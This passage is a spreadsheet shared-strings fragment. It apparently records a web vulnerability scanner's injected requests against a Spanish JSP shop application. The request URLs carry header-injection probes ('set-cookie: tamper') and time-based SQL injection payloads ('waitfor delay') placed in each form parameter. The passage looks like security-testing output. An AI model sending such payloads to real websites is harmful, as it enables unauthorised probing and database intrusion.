    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=anyset-cookie:+tamper=175083876973395307&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=7415145398045557783&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=any?set-cookie:+tamper=175083876973395307&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=any?</t>
  </si>
  <si>
    <t>&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=anyset-cookie:+tamper=7415145398045557783&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=any?set-cookie:+tamper=7415145398045557783&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=set-cookie:+tamper=175083876973395307&amp;b1=entrar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=7415145398045557783</t>
  </si>
  <si>
    <t>&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=175083876973395307&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=set-cookie:+tamper=7415145398045557783&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=anyset-cookie:+tamper=175083876973395307&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=7415145398045557783&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=any?set-cookie:+tamper=175083876973395307&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=anyset-cookie:+tamper=7415145398045557783&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=any?set-cookie:+tamper=7415145398045557783&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=set-cookie:+tamper=175083876973395307</t>
  </si>
  <si>
    <t>&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=any</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=set-cookie:+tamper=7415145398045557783</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=anyset-cookie:+tamper=175083876973395307</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=any</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=any?set-cookie:+tamper=175083876973395307</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=anyset-cookie:+tamper=7415145398045557783</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=any?set-cookie:+tamper=7415145398045557783</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=set-cookie:+tamper=3903524996989353353&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=3903524996989353353&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=anyset-cookie:+tamper=3903524996989353353&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=any?set-cookie:+tamper=3903524996989353353&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=set-cookie:+tamper=1646703415193285158&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=registrar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=3903524996989353353</t>
  </si>
  <si>
    <t>&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=any
set-cookie:+tamper=1646703415193285158&amp;login=pepe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any?
set-cookie:+tamper=1646703415193285158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set-cookie:+tamper=3903524996989353353</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=anyset-cookie:+tamper=1646703415193285158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any</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=any?set-cookie:+tamper=1646703415193285158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any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=any
set-cookie:+tamper=1646703415193285158
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anyset-cookie:+tamper=3903524996989353353</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=any?
set-cookie:+tamper=1646703415193285158
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any?set-cookie:+tamper=3903524996989353353</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=1646703415193285158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any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=registrar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=1646703415193285158</t>
  </si>
  <si>
    <t>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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158
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any?
set-cookie:+tamper=1646703415193285158
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set-cookie:+tamper=1646703415193285158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any
set-cookie:+tamper=1646703415193285158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any?
set-cookie:+tamper=1646703415193285158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anyset-cookie:+tamper=1646703415193285158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any?set-cookie:+tamper=1646703415193285158</t>
  </si>
  <si>
    <t xml:space="preserve">/antoanweb/publico/registro.jsp?modo=registro&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=any
set-cookie:+tamper=1646703415193285158
</t>
  </si>
  <si>
    <t xml:space="preserve">/antoanweb/publico/registro.jsp?modo=registro&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=any?
set-cookie:+tamper=1646703415193285158
</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar'injected_param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';waitfor+delay+'0:0:15';--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;waitfor+delay+'0:0:15';--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');waitfor+delay+'0:0:15';--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','0');waitfor+delay+'0:0:15';--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','0','0');waitfor+delay+'0:0:15';--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','0','0','0');waitfor+delay+'0:0:15';--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','0','0','0','0');waitfor+delay+'0:0:15';--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'injected_param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pepe'injected_param&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito'injected_param</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe'injected_param&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito';waitfordelay'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez'injected_param&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito;waitfordelay'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito');waitfordelay'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito','0');waitfordelay'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito','0','0');waitfordelay'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=vaciarcarrito','0','0','0');waitfordelay'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1'injected_param&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1';waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es'injected_param&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1;waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1');waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1);waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1','0');waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1,'0');waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1','0','0');waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1,'0','0');waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1','0','0','0');waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c'injected_param&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1,'0','0','0');waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1','0','0','0','0');waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1,'0','0','0','0');waitfor+delay+'0:0:15';--&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3'injected_param&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3';waitfor+delay+'0:0:15';--&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a'injected_param&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3;waitfor+delay+'0:0:15';--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'injected_param&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3');waitfor+delay+'0:0:15';--&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3);waitfor+delay+'0:0:15';--&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3','0');waitfor+delay+'0:0:15';--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'injected_param&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3,'0');waitfor+delay+'0:0:15';--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'injected_param&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3','0','0');waitfor+delay+'0:0:15';--&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3,'0','0');waitfor+delay+'0:0:15';--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'injected_param&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3','0','0','0');waitfor+delay+'0:0:15';--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injected_param</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3,'0','0','0');waitfor+delay+'0:0:15';--&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3','0','0','0','0');waitfor+delay+'0:0:15';--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;waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3,'0','0','0','0');waitfor+delay+'0:0:15';--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;waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja'injected_param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);waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja';waitfor+delay+'0:0:15';--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,'0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja;waitfor+delay+'0:0:15';--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,'0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja');waitfor+delay+'0:0:15';--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,'0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja','0');waitfor+delay+'0:0:15';--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,'0','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja','0','0');waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'injected_param&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja','0','0','0');waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar';waitfor+delay+'0:0:15';--&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja','0','0','0','0');waitfor+delay+'0:0:15';--&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar;waitfor+delay+'0:0:15';--&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85'injected_param&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar');waitfor+delay+'0:0:15';--&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85';waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0');waitfor+delay+'0:0:15';--&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85;waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0','0');waitfor+delay+'0:0:15';--&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85');waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0','0','0');waitfor+delay+'0:0:15';--&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85);waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0','0','0','0');waitfor+delay+'0:0:15';--&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85','0');waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1'injected_param&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85,'0');waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar'injected_param</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85','0','0');waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar';waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85,'0','0');waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar;waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85,'0','0','0');waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85','0','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85,'0','0','0','0');waitfor+delay+'0:0:15';--&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito'injected_param</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=entrar','0','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito';waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar'injected_param&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito;waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar';waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar;waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar','0','0');waitfor+delay+'0:0:15';--&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito','0','0','0','0');waitfor+delay+'0:0:15';--</t>
  </si>
  <si>
